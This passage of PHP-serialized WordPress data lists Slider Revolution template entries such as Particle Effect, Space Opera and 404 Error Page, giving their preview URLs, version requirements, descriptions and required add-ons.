class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:315:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change the background images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:133;a:22:{s:2:\"id\";s:3:\"136\";s:5:\"title\";s:18:\"Coming Soon Add-On\";s:5:\"alias\";s:15:\"ComingSoonAddon\";s:3:\"zip\";s:19:\"ComingSoonAddon.zip\";s:3:\"uid\";s:32:\"51258492055b940099eb96ba52901fa9\";s:3:\"img\";s:26:\"ComingSoonAddon/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/coming-soon-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:133:\"<span class=\"ttm_content\">This slider template makes use of the brand new Coming Soon Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:134;a:25:{s:2:\"id\";s:3:\"137\";s:5:\"title\";s:22:\"Nice And Clean Package\";s:5:\"alias\";s:22:\"nice-and-clean-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"nice-and-clean-package\";s:3:\"img\";s:38:\"packages/templatepack_niceandclean.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:242:\"<span class=\"ttm_content\">The Nice & Clean Website Template uses groups & rows for a fully responsive website experience. Elegant blur effects available since version 5.3.1 make this template stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:135;a:22:{s:2:\"id\";s:3:\"138\";s:5:\"title\";s:18:\"Snow Effect Add-On\";s:5:\"alias\";s:9:\"snowaddon\";s:3:\"zip\";s:13:\"snowaddon.zip\";s:3:\"uid\";s:32:\"7408d8567b8af5716eaabd390422e51b\";s:3:\"img\";s:20:\"snowaddon/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/snow-effect-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:183:\"<span class=\"ttm_content\">Add a pleasant Snow Effect to your website with this slider template. Make sure to install the \"Holiday Snow\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:153:\"[{\"path\":\"revslider-snow-addon\\/revslider-snow-addon.php\",\"name\":\"Snow AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:136;a:22:{s:2:\"id\";s:3:\"139\";s:5:\"title\";s:19:\"Particle Effect One\";s:5:\"alias\";s:19:\"particle-effect-one\";s:3:\"zip\";s:23:\"particle-effect-one.zip\";s:3:\"uid\";s:32:\"a4611c906e35ca60f617da86217b5299\";s:3:\"img\";s:30:\"particle-effect-one/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/particle-effect-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:442:\"<span class=\"ttm_content\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \"BLEND MODE IMAGE\" layer and go to \"advanced style -> filters -> blend mode\".</span>\r\n<span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:137;a:22:{s:2:\"id\";s:3:\"140\";s:5:\"title\";s:19:\"Particle Effect Two\";s:5:\"alias\";s:19:\"particle-effect-two\";s:3:\"zip\";s:23:\"particle-effect-two.zip\";s:3:\"uid\";s:32:\"b8ecbf43374a69e4ab329ea834862ef8\";s:3:\"img\";s:30:\"particle-effect-two/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/particle-effect-intro/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:138;a:22:{s:2:\"id\";s:3:\"141\";s:5:\"title\";s:21:\"Particle Effect Three\";s:5:\"alias\";s:21:\"particle-effect-three\";s:3:\"zip\";s:25:\"particle-effect-three.zip\";s:3:\"uid\";s:32:\"b33bc2c5655d8d51cd17c3740f72e748\";s:3:\"img\";s:32:\"particle-effect-three/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/particle-background-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:437:\"<span class=\"ttm_content\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \"BLEND IMAGE\" layer and go to \"advanced style -> filters -> blend mode\".</span>\r\n<span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:139;a:22:{s:2:\"id\";s:3:\"142\";s:5:\"title\";s:16:\"Portfolio Viewer\";s:5:\"alias\";s:15:\"portfolioviewer\";s:3:\"zip\";s:19:\"portfolioviewer.zip\";s:3:\"uid\";s:32:\"9ac7230ff5b880fb6c8f28fbbc123b3b\";s:3:\"img\";s:26:\"portfolioviewer/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/wordpress-portfolio-plugin/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:207:\"<span class=\"ttm_content\">This slider template can be used to display your portfolio highlights in a stunning way, utilising out free particles add-on and blend modes.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:387:\"<span class=\"ttm_content\">The navigation for the slides is found in the <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">Static Layers</a>.</span><span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:140;a:22:{s:2:\"id\";s:3:\"143\";s:5:\"title\";s:12:\"App Showcase\";s:5:\"alias\";s:11:\"appshowcase\";s:3:\"zip\";s:15:\"appshowcase.zip\";s:3:\"uid\";s:32:\"082aef931b0369080bc30c3a2a0c331f\";s:3:\"img\";s:22:\"appshowcase/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/app-showcase-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">This template shows off our new \"Polyfold Effects\" Add-On in form of an App product showcase module. Get started now and illustrate your Apps key features in a striking way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:179:\"[{\"path\":\"revslider-polyfold-addon\\/revslider-polyfold-addon.php\",\"name\":\"Polyfold Scroll Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:141;a:22:{s:2:\"id\";s:3:\"144\";s:5:\"title\";s:19:\"Gravity Design Hero\";s:5:\"alias\";s:13:\"gravitydesign\";s:3:\"zip\";s:17:\"gravitydesign.zip\";s:3:\"uid\";s:32:\"7bdbe73a6e5bf290cb4412708ac4134d\";s:3:\"img\";s:24:\"gravitydesign/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/best-wordpress-slider-plugin-2017/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:205:\"<span class=\"ttm_content\">This hero template shows a striking mouse-parallax scene and cool particle effects. Requires our \"Particle Effects\" Add-on to be installed.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:142;a:22:{s:2:\"id\";s:3:\"145\";s:5:\"title\";s:14:\"404 Error Page\";s:5:\"alias\";s:12:\"404errorpage\";s:3:\"zip\";s:16:\"404errorpage.zip\";s:3:\"uid\";s:32:\"2dc62d802b42b73088651cac17d0c486\";s:3:\"img\";s:23:\"404errorpage/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/404-error-page-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:227:\"<span class=\"ttm_content\">This template can be used as a custom error page on your website with our new 404 page Add-On. Of course you can also use this template as a regular hero header.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:179:\"{\"1\":{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}}\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:143;a:22:{s:2:\"id\";s:3:\"146\";s:5:\"title\";s:16:\"Carousel Gallery\";s:5:\"alias\";s:15:\"carouselgallery\";s:3:\"zip\";s:19:\"carouselgallery.zip\";s:3:\"uid\";s:32:\"041838fd32923c40e15c998f0ea19526\";s:3:\"img\";s:26:\"carouselgallery/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/wordpress-carousel-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:159:\"<span class=\"ttm_content\">This carousel gallery features a subtle parallax effect, html5 video and a fullscreen button.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:144;a:22:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:16:\"Filmstrip Effect\";s:5:\"alias\";s:9:\"filmstrip\";s:3:\"zip\";s:13:\"filmstrip.zip\";s:3:\"uid\";s:32:\"7bd142f272cc15d86998a79520e9e581\";s:3:\"img\";s:20:\"filmstrip/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/filmstrip-add-on-slider/ \";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">This template uses our Filmstrip Add-On to display a continuous scrolling set of images per slide.\r\n There is lots of customization options like animation speed and direction.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:180:\"[{\"path\":\"revslider-filmstrip-addon\\/revslider-filmstrip-addon.php\",\"name\":\"Background FilmStrip Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:145;a:22:{s:2:\"id\";s:3:\"148\";s:5:\"title\";s:11:\"Space Opera\";s:5:\"alias\";s:10:\"spaceopera\";s:3:\"zip\";s:14:\"spaceopera.zip\";s:3:\"uid\";s:32:\"a2c8bffcb138a86c0f373adebb6de046\";s:3:\"img\";s:21:\"spaceopera/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/space-opera-presentation/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:201:\"<span class=\"ttm_content\">The Space Opera template can be enjoyed as a slow paced, full-screen slider experience and is great to show your most prominent photos.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:146;a:22:{s:2:\"id\";s:3:\"149\";s:5:\"title\";s:13:\"Website Intro\";s:5:\"alias\";s:12:\"websiteintro\";s:3:\"zip\";s:16:\"websiteintro.zip\";s:3:\"uid\";s:32:\"348df76d999456aa19be58c9df56ae20\";s:3:\"img\";s:23:\"websiteintro/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/website-intro-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:274:\"<span class=\"ttm_content\">Making use of our new Slicey Add-On, this slider show a really cool effect you just have to experience yourself! Just change the slides background images and the existing slices will automatically be applied.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:147;a:22:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:13:\"Mask Showcase\";s:5:\"alias\";s:12:\"maskshowcase\";s:3:\"zip\";s:16:\"maskshowcase.zip\";s:3:\"uid\";s:32:\"fc943c31e2da9c63b252aeabf554d128\";s:3:\"img\";s:23:\"maskshowcase/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/minimal-mask-showcase/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Mask Showcase template uses gradients and the amazing block layer animations. A minimal slider treat for any website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:148;a:22:{s:2:\"id\";s:3:\"151\";s:5:\"title\";s:20:\"Parallax Zoom Slices\";s:5:\"alias\";s:18:\"parallaxzoomslices\";s:3:\"zip\";s:22:\"parallaxzoomslices.zip\";s:3:\"uid\";s:32:\"83537cae05709ddb9bcb7375470a5894\";s:3:\"img\";s:29:\"parallaxzoomslices/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/parallax-zoom-slices-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:249:\"<span class=\"ttm_content\">This template uses the Slicey Add-On to add a unique effect to slide background images. You can simple change the background images and the slice effect will automatically be applied.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:149;a:23:{s:2:\"id\";s:3:\"152\";s:5:\"title\";s:22:\"Double Exposure Effect\";s:5:\"alias\";s:20:\"doubleexposureeffect\";s:3:\"zip\";s:24:\"doubleexposureeffect.zip\";s:3:\"uid\";s:32:\"8d9229b5cbcf5bda5fbdc6a8e01a2b8c\";s:3:\"img\";s:31:\"doubleexposureeffect/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/wordpress-double-exposure-effect/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">Make any website special with the double exposure effect slider. Use as a header module or anywhere you want!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:150;a:22:{s:2:\"id\";s:3:\"153\";s:5:\"title\";s:24:\"Mountain Parallax Header\";s:5:\"alias\";s:22:\"mountainparallaxheader\";s:3:\"zip\";s:26:\"mountainparallaxheader.zip\";s:3:\"uid\";s:32:\"8dc64663f317a2abdf179bbe341d016e\";s:3:\"img\";s:33:\"mountainparallaxheader/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/mountain-wordpress-parallax-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:192:\"<span class=\"ttm_content\">This template is a cool intro for any page, featuring a striking parallax effect. Just change texts and links and you\'re done!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:151;a:25:{s:2:\"id\";s:3:\"154\";s:5:\"title\";s:26:\"GoodNews One-Pager Package\";s:5:\"alias\";s:26:\"goodnews-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"goodnews-one-pager-package\";s:3:\"img\";s:44:\"packages/templatepack_goodnews_one_pager.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution 